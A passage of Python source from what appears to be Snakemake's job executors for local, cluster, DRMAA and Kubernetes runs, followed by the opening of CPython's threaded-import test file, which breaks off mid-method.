This lets all items run simultaneously.""" # we only have to consider pipe groups because in local running mode, # these are the only groups that will occur futures = [self.run_single_job(j) for j in job] while True: k = 0 for f in futures: if f.done(): ex = f.exception() if ex is not None: # kill all shell commands of the other group jobs # there can be only shell commands because the # run directive is not allowed for pipe jobs for j in job: shell.kill(j.jobid) raise ex else: k += 1 if k == len(futures): return time.sleep(1) def spawn_job(self, job): exec_job = self.exec_job cmd = self.format_job_pattern(exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait) try: subprocess.check_call(cmd, shell=True) except subprocess.CalledProcessError as e: raise SpawnedJobError() def shutdown(self): self.pool.shutdown() def cancel(self): self.pool.shutdown() def _callback(self, job, callback, error_callback, future): try: ex = future.exception() if ex is not None: raise ex callback(job) except _ProcessPoolExceptions: self.handle_job_error(job) # no error callback, just silently ignore the interrupt as the main scheduler is also killed except SpawnedJobError: # don't print error message, this is done by the spawned subprocess error_callback(job) except (Exception, BaseException) as ex: self.print_job_error(job) if not (job.is_group() or job.shellcmd): print_exception(ex, self.workflow.linemaps) error_callback(job) def handle_job_success(self, job): super().handle_job_success(job) def handle_job_error(self, job): super().handle_job_error(job) job.cleanup() self.workflow.persistence.cleanup(job) class ClusterExecutor(RealExecutor): default_jobscript = "jobscript.sh" def __init__(self, workflow, dag, cores, jobname="snakejob.{name}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, cluster_config=None, local_input=None, restart_times=None, exec_job=None, assume_shared_fs=True, max_status_checks_per_second=1): from ratelimiter import RateLimiter local_input = local_input or [] super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, assume_shared_fs=assume_shared_fs) if not self.assume_shared_fs: # use relative path to Snakefile self.snakefile = os.path.relpath(workflow.snakefile) jobscript = workflow.jobscript if jobscript is None: jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript) try: with open(jobscript) as f: self.jobscript = f.read() except IOError as e: raise WorkflowError(e) if not "jobid" in get_wildcard_names(jobname): raise WorkflowError( "Defined jobname (\"{}\") has to contain the wildcard {jobid}.") if exec_job is None: self.exec_job = '\\\n'.join(( 'cd {workflow.workdir_init} && ' if assume_shared_fs else '', '{sys.executable} ' if assume_shared_fs else 'python ', '-m snakemake {target} --snakefile {snakefile} ', '--force -j{cores} --keep-target-files --keep-remote ', '--wait-for-files {wait_for_files} --latency-wait {latency_wait} ', ' --attempt {attempt} {use_threads} ', '--wrapper-prefix {workflow.wrapper_prefix} ', '{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ' '--nocolor --notemp --no-hooks --nolock ', '--mode {} '.format(Mode.cluster))) else: self.exec_job = exec_job if self.workflow.shadow_prefix: self.exec_job += " --shadow-prefix {} ".format( self.workflow.shadow_prefix) if self.workflow.use_conda: self.exec_job += " --use-conda " if self.workflow.conda_prefix: self.exec_job += " --conda-prefix {} ".format( 
self.workflow.conda_prefix) if self.workflow.use_singularity: self.exec_job += " --use-singularity " if self.workflow.singularity_prefix: self.exec_job += " --singularity-prefix {} ".format( self.workflow.singularity_prefix) if self.workflow.singularity_args: self.exec_job += " --singularity-args \"{}\"".format( self.workflow.singularity_args) if self.workflow.use_docker: self.exec_job += " --use-docker " #if self.workflow.singularity_prefix: # self.exec_job += " --singularity-prefix {} ".format( # self.workflow.singularity_prefix) if self.workflow.docker_args: self.exec_job += " --docker-args \"{}\"".format( self.workflow.docker_args) self.exec_job += self.get_default_remote_provider_args() self.jobname = jobname self._tmpdir = None self.cores = cores if cores else "" self.cluster_config = cluster_config if cluster_config else dict() self.restart_times = restart_times self.active_jobs = list() self.lock = threading.Lock() self.wait = True self.wait_thread = threading.Thread(target=self._wait_for_jobs) self.wait_thread.daemon = True self.wait_thread.start() self.max_status_checks_per_second = max_status_checks_per_second self.status_rate_limiter = RateLimiter( max_calls=self.max_status_checks_per_second, period=1) def shutdown(self): with self.lock: self.wait = False self.wait_thread.join() if not self.workflow.immediate_submit: # Only delete tmpdir (containing jobscripts) if not using # immediate_submit. With immediate_submit, jobs can be scheduled # after this method is completed. Hence we have to keep the # directory. shutil.rmtree(self.tmpdir) def cancel(self): self.shutdown() def _run(self, job, callback=None, error_callback=None): if self.assume_shared_fs: job.remove_existing_output() job.download_remote_input() super()._run(job, callback=callback, error_callback=error_callback) @property def tmpdir(self): if self._tmpdir is None: self._tmpdir = mkdtemp(dir=".snakemake", prefix="tmp.") return os.path.abspath(self._tmpdir) def get_jobscript(self, job): f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job)) if os.path.sep in f: raise WorkflowError("Path separator ({}) found in job name {}. 
" "This is not supported.".format( os.path.sep, f)) return os.path.join(self.tmpdir, f) def format_job(self, pattern, job, **kwargs): wait_for_files = [] if self.assume_shared_fs: wait_for_files.append(self.tmpdir) wait_for_files.extend(job.get_wait_for_files()) format_p = partial(self.format_job_pattern, job=job, properties=job.properties( cluster=self.cluster_params(job)), latency_wait=self.latency_wait, wait_for_files=wait_for_files, **kwargs) try: return format_p(pattern) except KeyError as e: raise WorkflowError( "Error formatting jobscript: {} not found\n" "Make sure that your custom jobscript is up to date.".format(e)) def write_jobscript(self, job, jobscript, **kwargs): # only force threads if this is not a group job # otherwise we want proper process handling use_threads = "--force-use-threads" if not job.is_group() else "" exec_job = self.format_job(self.exec_job, job, _quote_all=True, use_threads=use_threads, **kwargs) content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs) logger.debug("Jobscript:\n{}".format(content)) with open(jobscript, "w") as f: print(content, file=f) os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR) def cluster_params(self, job): """Return wildcards object for job from cluster_config.""" cluster = self.cluster_config.get("__default__", dict()).copy() cluster.update(self.cluster_config.get(job.name, dict())) # Format values with available parameters from the job. for key, value in list(cluster.items()): if isinstance(value, str): try: cluster[key] = job.format_wildcards(value) except NameError as e: if job.is_group(): msg = ("Failed to format cluster config for group job. " "You have to ensure that your default entry " "does not contain any items that group jobs " "cannot provide, like {rule}, {wildcards}.") else: msg = ("Failed to format cluster config " "entry for job {}.".format(job.rule.name)) raise WorkflowError(msg, e) return cluster def cluster_wildcards(self, job): return Wildcards(fromdict=self.cluster_params(job)) def handle_job_success(self, job): super().handle_job_success(job, upload_remote=False, handle_log=False, handle_touch=False) def handle_job_error(self, job): # TODO what about removing empty remote dirs?? This cannot be decided # on the cluster node. super().handle_job_error(job, upload_remote=False) logger.debug("Cleanup job metadata.") # We have to remove metadata here as well. # It will be removed by the CPUExecutor in case of a shared FS, # but we might not see the removal due to filesystem latency. # By removing it again, we make sure that it is gone on the host FS. self.workflow.persistence.cleanup(job) def print_cluster_job_error(self, job_info, jobid): job = job_info.job kind = "rule {}".format(job.rule.name) if not job.is_group else "group job {}".format(job.groupid) logger.error("Error executing {} on cluster (jobid: {}, external: " "{}, jobscript: {}). 
For error details see the cluster " "log and the log files of the involved rule(s).".format(kind, jobid, job_info.jobid, job_info.jobscript)) GenericClusterJob = namedtuple("GenericClusterJob", "job jobid callback error_callback jobscript jobfinished jobfailed") class GenericClusterExecutor(ClusterExecutor): def __init__(self, workflow, dag, cores, submitcmd="qsub", statuscmd=None, cluster_config=None, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, restart_times=0, assume_shared_fs=True, max_status_checks_per_second=1): self.submitcmd = submitcmd if not assume_shared_fs and statuscmd is None: raise WorkflowError("When no shared filesystem can be assumed, a " "status command must be given.") self.statuscmd = statuscmd self.external_jobid = dict() super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=max_status_checks_per_second) if statuscmd: self.exec_job += ' && exit 0 || exit 1' elif assume_shared_fs: # TODO wrap with watch and touch {jobrunning} # check modification date of {jobrunning} in the wait_for_job method self.exec_job += ' && touch "{jobfinished}" || (touch "{jobfailed}"; exit 1)' else: raise WorkflowError("If no shared filesystem is used, you have to " "specify a cluster status command.") def cancel(self): logger.info("Will exit after finishing currently running jobs.") self.shutdown() def register_job(self, job): # Do not register job here. # Instead do it manually once the jobid is known. pass def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) workdir = os.getcwd() jobid = job.jobid jobscript = self.get_jobscript(job) jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid)) jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid)) self.write_jobscript(job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed) if self.statuscmd: ext_jobid = self.dag.incomplete_external_jobid(job) if ext_jobid: # Job is incomplete and still running. # We simply register it and wait for completion or failure. 
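                # dag.incomplete_external_jobid() only returns a jobid for jobs
                # marked incomplete from a previous run (e.g. after snakemake was
                # interrupted while the cluster job kept running), so resubmission
                # is skipped and the existing cluster job is monitored instead.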
logger.info( "Resuming incomplete job {} with external jobid '{}'.".format( jobid, ext_jobid)) submit_callback(job) with self.lock: self.active_jobs.append( GenericClusterJob(job, ext_jobid, callback, error_callback, jobscript, jobfinished, jobfailed)) return deps = " ".join(self.external_jobid[f] for f in job.input if f in self.external_jobid) try: submitcmd = job.format_wildcards( self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None) try: ext_jobid = subprocess.check_output( '{submitcmd} "{jobscript}"'.format(submitcmd=submitcmd, jobscript=jobscript), shell=True).decode().split("\n") except subprocess.CalledProcessError as ex: logger.error("Error submitting jobscript (exit code {}):\n{}".format( ex.returncode, ex.output.decode())) error_callback(job) return if ext_jobid and ext_jobid[0]: ext_jobid = ext_jobid[0] self.external_jobid.update((f, ext_jobid) for f in job.output) logger.info("Submitted {} {} with external jobid '{}'.".format( "group job" if job.is_group() else "job", jobid, ext_jobid)) self.workflow.persistence.started( job, external_jobid=ext_jobid) submit_callback(job) with self.lock: self.active_jobs.append(GenericClusterJob( job, ext_jobid, callback, error_callback, jobscript, jobfinished, jobfailed)) def _wait_for_jobs(self): success = "success" failed = "failed" running = "running" if self.statuscmd is not None: def job_status(job): try: # this command shall return "success", "failed" or "running" return subprocess.check_output( '{statuscmd} {jobid}'.format(jobid=job.jobid, statuscmd=self.statuscmd), shell=True).decode().split("\n")[0] except subprocess.CalledProcessError as e: if e.returncode < 0: # Ignore SIGINT and all other issues due to signals # because it will be caused by hitting e.g. # Ctrl-C on the main process or sending killall to # snakemake. # Snakemake will handle the signal in # the master process. pass else: raise WorkflowError("Failed to obtain job status. " "See above for error message.") else: def job_status(job): if os.path.exists(active_job.jobfinished): os.remove(active_job.jobfinished) os.remove(active_job.jobscript) return success if os.path.exists(active_job.jobfailed): os.remove(active_job.jobfailed) os.remove(active_job.jobscript) return failed return running while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() logger.debug("Checking status of {} jobs.".format(len(active_jobs))) for active_job in active_jobs: with self.status_rate_limiter: status = job_status(active_job) if status == success: active_job.callback(active_job.job) elif status == failed: self.print_job_error( active_job.job, cluster_jobid=active_job.jobid if active_job.jobid else "unknown", ) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) else: still_running.append(active_job) with self.lock: self.active_jobs.extend(still_running) sleep() SynchronousClusterJob = namedtuple("SynchronousClusterJob", "job jobid callback error_callback jobscript process") class SynchronousClusterExecutor(ClusterExecutor): """ invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are synchronous, blocking the foreground thread and returning the remote exit code at remote exit. 
""" def __init__(self, workflow, dag, cores, submitcmd="qsub", cluster_config=None, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, restart_times=0, assume_shared_fs=True): super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=10) self.submitcmd = submitcmd self.external_jobid = dict() def cancel(self): logger.info("Will exit after finishing currently running jobs.") self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) workdir = os.getcwd() jobid = job.jobid jobscript = self.get_jobscript(job) self.write_jobscript(job, jobscript) deps = " ".join(self.external_jobid[f] for f in job.input if f in self.external_jobid) try: submitcmd = job.format_wildcards( self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None) process = subprocess.Popen('{submitcmd} "{jobscript}"'.format(submitcmd=submitcmd, jobscript=jobscript), shell=True) submit_callback(job) with self.lock: self.active_jobs.append(SynchronousClusterJob( job, process.pid, callback, error_callback, jobscript, process)) def _wait_for_jobs(self): while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for active_job in active_jobs: with self.status_rate_limiter: exitcode = active_job.process.poll() if exitcode is None: # job not yet finished still_running.append(active_job) elif exitcode == 0: # job finished successfully os.remove(active_job.jobscript) active_job.callback(active_job.job) else: # job failed os.remove(active_job.jobscript) self.print_job_error(active_job.job) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) with self.lock: self.active_jobs.extend(still_running) sleep() DRMAAClusterJob = namedtuple("DRMAAClusterJob", "job jobid callback error_callback jobscript") class DRMAAExecutor(ClusterExecutor): def __init__(self, workflow, dag, cores, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, drmaa_args="", drmaa_log_dir=None, latency_wait=3, cluster_config=None, restart_times=0, assume_shared_fs=True, max_status_checks_per_second=1): super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=max_status_checks_per_second) try: import drmaa except ImportError: raise WorkflowError( "Python support for DRMAA is not installed. " "Please install it, e.g. 
with easy_install3 --user drmaa") except RuntimeError as e: raise WorkflowError("Error loading drmaa support:\n{}".format(e)) self.session = drmaa.Session() self.drmaa_args = drmaa_args self.drmaa_log_dir = drmaa_log_dir self.session.initialize() self.submitted = list() def cancel(self): from drmaa.const import JobControlAction from drmaa.errors import InvalidJobException, InternalException for jobid in self.submitted: try: self.session.control(jobid, JobControlAction.TERMINATE) except (InvalidJobException, InternalException): #This is common - logging a warning would probably confuse the user. pass self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) jobscript = self.get_jobscript(job) self.write_jobscript(job, jobscript) try: drmaa_args = job.format_wildcards( self.drmaa_args, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule) import drmaa if self.drmaa_log_dir: makedirs(self.drmaa_log_dir) try: jt = self.session.createJobTemplate() jt.remoteCommand = jobscript jt.nativeSpecification = drmaa_args if self.drmaa_log_dir: jt.outputPath = ":" + self.drmaa_log_dir jt.errorPath = ":" + self.drmaa_log_dir jt.jobName = os.path.basename(jobscript) jobid = self.session.runJob(jt) except (drmaa.DeniedByDrmException, drmaa.InternalException, drmaa.InvalidAttributeValueException) as e: print_exception(WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps) error_callback(job) return logger.info("Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)) self.submitted.append(jobid) self.session.deleteJobTemplate(jt) submit_callback(job) with self.lock: self.active_jobs.append(DRMAAClusterJob( job, jobid, callback, error_callback, jobscript)) def shutdown(self): super().shutdown() self.session.exit() def _wait_for_jobs(self): import drmaa while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for active_job in active_jobs: with self.status_rate_limiter: try: retval = self.session.wait(active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT) except drmaa.ExitTimeoutException as e: # job still active still_running.append(active_job) continue except (drmaa.InternalException, Exception) as e: print_exception(WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps) os.remove(active_job.jobscript) active_job.error_callback(active_job.job) continue # job exited os.remove(active_job.jobscript) if not retval.wasAborted and retval.hasExited and retval.exitStatus == 0: active_job.callback(active_job.job) else: self.print_job_error(active_job.job) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) with self.lock: self.active_jobs.extend(still_running) sleep() @contextlib.contextmanager def change_working_directory(directory=None): """ Change working directory in execution context if provided. 
""" if directory: try: saved_directory = os.getcwd() logger.info("Changing to shadow directory: {}".format(directory)) os.chdir(directory) yield finally: os.chdir(saved_directory) else: yield KubernetesJob = namedtuple("KubernetesJob", "job jobid callback error_callback kubejob jobscript") class KubernetesExecutor(ClusterExecutor): def __init__(self, workflow, dag, namespace, envvars, container_image=None, jobname="{rulename}.{jobid}", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, cluster_config=None, local_input=None, restart_times=None): exec_job = ( 'cp -rf /source/. . && ' 'snakemake {target} --snakefile {snakefile} ' '--force -j{cores} --keep-target-files --keep-remote ' '--latency-wait 0 ' ' --attempt {attempt} {use_threads} ' '--wrapper-prefix {workflow.wrapper_prefix} ' '{overwrite_config} {printshellcmds} {rules} --nocolor ' '--notemp --no-hooks --nolock ') super().__init__(workflow, dag, None, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, local_input=local_input, restart_times=restart_times, exec_job=exec_job, assume_shared_fs=False, max_status_checks_per_second=10) # use relative path to Snakefile self.snakefile = os.path.relpath(workflow.snakefile) try: from kubernetes import config except ImportError: raise WorkflowError("The Python 3 package 'kubernetes' " "must be installed to use Kubernetes") config.load_kube_config() import kubernetes.client self.kubeapi = kubernetes.client.CoreV1Api() self.batchapi = kubernetes.client.BatchV1Api() self.namespace = namespace self.envvars = envvars or [] self.secret_files = {} self.run_namespace = str(uuid.uuid4()) self.secret_envvars = {} self.register_secret() self.container_image = ( container_image or get_container_image()) def register_secret(self): import kubernetes.client secret = kubernetes.client.V1Secret() secret.metadata = kubernetes.client.V1ObjectMeta() # create a random uuid secret.metadata.name = self.run_namespace secret.type = "Opaque" secret.data = {} for i, f in enumerate(self.workflow.get_sources()): if f.startswith(".."): logger.warning("Ignoring source file {}. Only files relative " "to the working directory are allowed.".format(f)) continue with open(f, "br") as content: key = "f{}".format(i) self.secret_files[key] = f secret.data[key] = base64.b64encode(content.read()).decode() for e in self.envvars: try: key = e.lower() secret.data[key] = base64.b64encode(os.environ[e].encode()).decode() self.secret_envvars[key] = e except KeyError: continue self.kubeapi.create_namespaced_secret(self.namespace, secret) def unregister_secret(self): import kubernetes.client self.kubeapi.delete_namespaced_secret(self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()) def shutdown(self): self.unregister_secret() super().shutdown() def cancel(self): import kubernetes.client body = kubernetes.client.V1DeleteOptions() with self.lock: for j in self.active_jobs: self.kubeapi.delete_namespaced_pod( j.jobid, self.namespace, body=body) self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): import kubernetes.client super()._run(job) exec_job = self.format_job( self.exec_job, job, _quote_all=True, use_threads="--force-use-threads" if not job.is_group() else "") # Kubernetes silently does not submit a job if the name is too long # therefore, we ensure that it is not longer than snakejob+uuid. 
jobid = "snakejob-{}".format( get_uuid("{}-{}-{}".format( self.run_namespace, job.jobid, job.attempt))) body = kubernetes.client.V1Pod() body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"}) body.metadata.name = jobid # container container = kubernetes.client.V1Container(name=jobid) container.image = self.container_image container.command = shlex.split("/bin/sh") container.args = ["-c", exec_job] container.working_dir = "/workdir" container.volume_mounts = [kubernetes.client.V1VolumeMount( name="workdir", mount_path="/workdir")] container.volume_mounts = [kubernetes.client.V1VolumeMount( name="source", mount_path="/source")] body.spec = kubernetes.client.V1PodSpec(containers=[container]) # fail on first error body.spec.restart_policy = "Never" # source files as a secret volume # we copy these files to the workdir before executing Snakemake too_large = [path for path in self.secret_files.values() if os.path.getsize(path) > 1000000] if too_large: raise WorkflowError("The following source files exceed the maximum " "file size (1MB) that can be passed from host to " "kubernetes. These are likely not source code " "files. Consider adding them to your " "remote storage instead or (if software) use " "Conda packages or container images:\n{}".format( "\n".join(too_large))) secret_volume = kubernetes.client.V1Volume(name="source") secret_volume.secret = kubernetes.client.V1SecretVolumeSource() secret_volume.secret.secret_name = self.run_namespace secret_volume.secret.items = [ kubernetes.client.V1KeyToPath(key=key, path=path) for key, path in self.secret_files.items() ] # workdir as an emptyDir volume of undefined size workdir_volume = kubernetes.client.V1Volume(name="workdir") workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource() body.spec.volumes = [secret_volume, workdir_volume] # env vars container.env = [] for key, e in self.secret_envvars.items(): envvar = kubernetes.client.V1EnvVar(name=e) envvar.value_from = kubernetes.client.V1EnvVarSource() envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector( key=key, name=self.run_namespace) container.env.append(envvar) # request resources container.resources = kubernetes.client.V1ResourceRequirements() container.resources.requests = {} # Subtract 1 from the requested number of cores. # The reason is that kubernetes requires some cycles for # maintenance, but won't use a full core for that. # This way, we should be able to saturate the node without exceeding it # too much. 
container.resources.requests["cpu"] = job.resources["_cores"] - 1 if "mem_mb" in job.resources.keys(): container.resources.requests["memory"] = "{}M".format( job.resources["mem_mb"]) # capabilities if job.needs_singularity and self.workflow.use_singularity: # TODO this should work, but it doesn't currently because of # missing loop devices # singularity inside docker requires SYS_ADMIN capabilities # see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc # container.capabilities = kubernetes.client.V1Capabilities() # container.capabilities.add = ["SYS_ADMIN", # "DAC_OVERRIDE", # "SETUID", # "SETGID", # "SYS_CHROOT"] # Running in priviledged mode always works container.security_context = kubernetes.client.V1SecurityContext( privileged=True) pod = self._kubernetes_retry( lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)) logger.info("Get status with:\n" "kubectl describe pod {jobid}\n" "kubectl logs {jobid}".format(jobid=jobid)) self.active_jobs.append(KubernetesJob( job, jobid, callback, error_callback, pod, None)) def _kubernetes_retry(self, func): import kubernetes with self.lock: try: return func() except kubernetes.client.rest.ApiException as e: if e.status == 401: # Unauthorized. # Reload config in order to ensure token is # refreshed. Then try again. logger.info("trying to reauthenticate") kubernetes.config.load_kube_config() subprocess.run(['kubectl','get','nodes']) self.kubeapi = kubernetes.client.CoreV1Api() self.batchapi = kubernetes.client.BatchV1Api() self.register_secret() try: return func() except kubernetes.client.rest.ApiException as e: # Both attempts failed, raise error. raise WorkflowError(e, "This is likely a bug in " "https://github.com/kubernetes-client/python.") #Handling timeout that may occur in case of GKE master upgrade except urllib3.exceptions.MaxRetryError as e: logger.info( "Request time out! " "check your connection to Kubernetes master" "Workflow will pause for 5 minutes to allow any update operations to complete") time.sleep (300) try: return func() except: #Still can't reach the server after 5 minutes raise WorkflowErroe(e, "Error 111 connection timeout, please check" " that the k8 cluster master is reachable!") def _wait_for_jobs(self): import kubernetes while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for j in active_jobs: with self.status_rate_limiter: logger.debug("Checking status for pod {}".format(j.jobid)) job_not_found = False try: res = self._kubernetes_retry( lambda: self.kubeapi.read_namespaced_pod_status(j.jobid, self.namespace)) except kubernetes.client.rest.ApiException as e: if e.status == 404: # Jobid not found # The job is likely already done and was deleted on # the server. j.callback(j.job) continue except WorkflowError as e: print_exception(e, self.workflow.linemaps) j.error_callback(j.job) continue if res is None: msg = ("Unknown pod {jobid}. 
" "Has the pod been deleted " "manually?").format(jobid=j.jobid) self.print_job_error(j.job, msg=msg, jobid=j.jobid) j.error_callback(j.job) elif res.status.phase == "Failed": msg = ("For details, please issue:\n" "kubectl describe pod {jobid}\n" "kubectl logs {jobid}").format(jobid=j.jobid) # failed self.print_job_error(j.job, msg=msg, jobid=j.jobid) j.error_callback(j.job) elif res.status.phase == "Succeeded": # finished j.callback(j.job) else: # still active still_running.append(j) with self.lock: self.active_jobs.extend(still_running) sleep() def run_wrapper(job_rule, input, output, params, wildcards, threads, resources, log, benchmark, benchmark_repeats, conda_env, singularity_img, singularity_args, use_singularity, linemaps, debug, shadow_dir, jobid, docker_img, docker_args, use_docker): """ Wrapper around the run method that handles exceptions and benchmarking. Arguments job_rule -- the ``job.rule`` member input -- list of input files output -- list of output files wildcards -- so far processed wildcards threads -- usable threads log -- list of log files shadow_dir -- optional shadow directory root """ # get shortcuts to job_rule members run = job_rule.run_func version = job_rule.version rule = job_rule.name is_shell = job_rule.shellcmd is not None if os.name == "posix" and debug: sys.stdin = open('/dev/stdin') if benchmark is not None: from snakemake.benchmark import BenchmarkRecord, benchmarked, write_benchmark_records # Change workdir if shadow defined and not using singularity. # Otherwise, we do the change from inside the container. passed_shadow_dir = None if use_singularity: passed_shadow_dir = shadow_dir shadow_dir = None try: with change_working_directory(shadow_dir): if benchmark: bench_records = [] for bench_iteration in range(benchmark_repeats): # Determine whether to benchmark this process or do not # benchmarking at all. We benchmark this process unless the # execution is done through the ``shell:``, ``script:``, or # ``wrapper:`` stanza. is_sub = (job_rule.shellcmd or job_rule.script or job_rule.wrapper or job_rule.cwl) if is_sub: # The benchmarking through ``benchmarked()`` is started # in the execution of the shell fragment, script, wrapper # etc, as the child PID is available there. bench_record = BenchmarkRecord() run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, bench_record, jobid, is_shell, bench_iteration, passed_shadow_dir) else: # The benchmarking is started here as we have a run section # and the generated Python function is executed in this # process' thread. 
with benchmarked() as bench_record: run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, bench_record, jobid, is_shell, bench_iteration, passed_shadow_dir) # Store benchmark record for this iteration bench_records.append(bench_record) else: run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, None, jobid, is_shell, None, passed_shadow_dir) except (KeyboardInterrupt, SystemExit) as e: # Re-raise the keyboard interrupt in order to record an error in the # scheduler but ignore it raise e except (Exception, BaseException) as ex: log_verbose_traceback(ex) # this ensures that exception can be re-raised in the parent thread lineno, file = get_exception_origin(ex, linemaps) raise RuleException(format_error(ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True)) if benchmark is not None: try: write_benchmark_records(bench_records, benchmark) except (Exception, BaseException) as ex: raise WorkflowError(ex)
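# The following is an illustrative sketch, not part of the executor sources
# above: a standalone status script that satisfies the contract which
# GenericClusterExecutor._wait_for_jobs expects from ``statuscmd`` -- it is
# invoked as "<statuscmd> <external jobid>" and must print exactly one of
# "success", "failed" or "running" on its first output line (wired up in
# snakemake via --cluster-status). The ``scontrol`` invocation and the state
# mapping are assumptions for a SLURM-like scheduler; adapt both to your
# cluster. Shown commented out because it belongs in its own executable file,
# not in this module:
#
#   #!/usr/bin/env python3
#   import re
#   import subprocess
#   import sys
#
#   jobid = sys.argv[1]
#   try:
#       out = subprocess.check_output(["scontrol", "show", "job", jobid],
#                                     universal_newlines=True)
#   except subprocess.CalledProcessError:
#       # Unknown to the scheduler: report failure so snakemake reacts.
#       print("failed")
#       sys.exit(0)
#
#   match = re.search(r"JobState=(\w+)", out)
#   state = match.group(1) if match else "UNKNOWN"
#   if state in ("PENDING", "CONFIGURING", "RUNNING", "COMPLETING",
#                "SUSPENDED"):
#       print("running")
#   elif state == "COMPLETED":
#       print("success")
#   else:
#       print("failed")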
test_threaded_import.py
# This is a variant of the very old (early 90's) file # Demo/threads/bug.py. It simply provokes a number of threads into # trying to import the same module "at the same time". # There are no pleasant failure modes -- most likely is that Python # complains several times about module random having no attribute # randrange, and then Python hangs. import _imp as imp import os import importlib import sys import time import shutil import threading import unittest from unittest import mock from test.support import (verbose, run_unittest) from test.support.import_helper import forget from test.support.os_helper import (TESTFN, unlink, rmtree) from test.support import threading_helper def task(N, done, done_tasks, errors): try: # We don't use modulefinder but still import it in order to stress # importing of different modules from several threads. if len(done_tasks) % 2: import modulefinder import random else: import random import modulefinder # This will fail if random is not completely initialized x = random.randrange(1, 3) except Exception as e: errors.append(e.with_traceback(None)) finally: done_tasks.append(threading.get_ident()) finished = len(done_tasks) == N if finished: done.set() def mock_register_at_fork(func): # bpo-30599: Mock os.register_at_fork() when importing the random module, # since this function doesn't allow to unregister callbacks and would leak # memory. return mock.patch('os.register_at_fork', create=True)(func) # Create a circular import structure: A -> C -> B -> D -> A # NOTE: `time` is already loaded and therefore doesn't threaten to deadlock. circular_imports_modules = { 'A': """if 1: import time time.sleep(%(delay)s) x = 'a' import C """, 'B': """if 1: import time time.sleep(%(delay)s) x = 'b' import D """, 'C': """import B""", 'D': """import A""", } class Finder: """A dummy finder to detect concurrent access to its find_spec() method.""" def __init__(self): self.numcalls = 0 self.x = 0 self.lock = threading.Lock() def find_spec(self, name, path=None, target=None): # Simulate some thread-unsafe behaviour. If calls to find_spec() # are properly serialized, `x` will end up the same as `numcalls`. # Otherwise not. assert imp.lock_held() with self.lock: self.numcalls += 1 x = self.x time.sleep(0.01) self.x = x + 1 class FlushingFinder: """A dummy finder which flushes sys.path_importer_cache when it gets called.""" def find_spec(self, name, path=None, target=None): sys.path_importer_cache.clear() class ThreadedImportTests(unittest.TestCase): def setUp(self): self.old_random = sys.modules.pop('random', None) def tearDown(self): # If the `random` module was already initialized, we restore the # old module at the end so that pickling tests don't fail. # See http://bugs.python.org/issue3657#msg110461 if self.old_random is not None: 